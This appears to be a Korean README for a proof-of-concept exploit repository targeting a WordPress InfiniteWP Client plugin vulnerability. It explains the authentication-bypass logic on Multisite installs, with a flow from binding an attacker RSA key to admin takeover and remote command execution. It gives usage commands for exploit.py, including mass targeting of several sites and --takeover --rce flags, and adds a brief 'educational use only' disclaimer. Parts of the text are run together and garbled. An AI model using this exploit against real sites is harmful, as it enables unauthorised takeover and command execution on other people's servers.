
InfiniteWP Client WordPress 플러그인의 CVE-2026-15038에 대한 PoC 익스플로잇: Multisite에서 인증을 우회하고, 공격자의 RSA 키를 바인딩하며, 관리자 계정 탈취로 권한을 상승시키고, WP-CLI를 통해 원격 명령을 실행합니다.
WordPress Multisite에서 인증되지 않은 관리자 계정 탈취
WordPress용 InfiniteWP Client 플러그인(< 1.13.6)은 Multisite 설치에 영향을 미치는 심각한 인증 우회 취약점을 포함하고 있습니다.
인증되지 않은 공격자는 다음을 수행할 수 있습니다:
if (!$iwp_mmb_core->get_option('iwp_client_action_message_id')
&& !$iwp_mmb_core->get_option('iwp_client_public_key'))
get_site_option() 사용 → 네트워크 수준(wp_sitemeta)에서 읽음update_blog_option() 사용 → 블로그별(wp_X_options)에 기록💥 결과: Multisite에서 guard는 항상 false를 반환 — 재페어링이 항상 허용됩니다.
if(trim($activation_key) != get_option('iwp_client_activate_key')){
get_option()이 false를 반환activation_key를 보내지 않음 → trim(null) → '''' != false → false → 검사 통과 🎯openssl_verify() 통과graph LR
A[Send POST Request] --> B[Add Site Action]
B --> C[Guard Bypassed]
C --> D[Activation Key Check Fails]
D --> E[Signature Verifies]
E --> F[Attacker Key Bound]
F --> G[Full Admin Access]
G --> H[RCE Achieved]
# Clone the repository
git clone https://github.com/yourusername/CVE-2026-15038.git
cd CVE-2026-15038
# Install dependencies
pip install -r requirements.txt
python3 exploit.py -t https://wordpress.ddev.site
python3 exploit.py -t https://target1.com -t https://target2.com -t https://target3.com
python3 exploit.py -t https://wordpress.ddev.site --command "wp plugin install hello-dolly --activate"
python3 exploit.py -t https://wordpress.ddev.site --takeover --rce
| 파일 | 설명 |
|---|---|
exploit.py | 🐍 대량 공격을 지원하는 메인 익스플로잇 스크립트 |
requirements.txt | 📦 Python 의존성 |
README.md | 📖 이 문서 |
add_site 요청 검토이 도구는 교육 및 보안 테스트 목적으로만 사용됩니다. 소유한 시스템이나 명시적 테스트 권한이 있는 시스템에서만 사용하십시오. 저자는 오용에 대해 어떠한 책임도 지지 않습니다.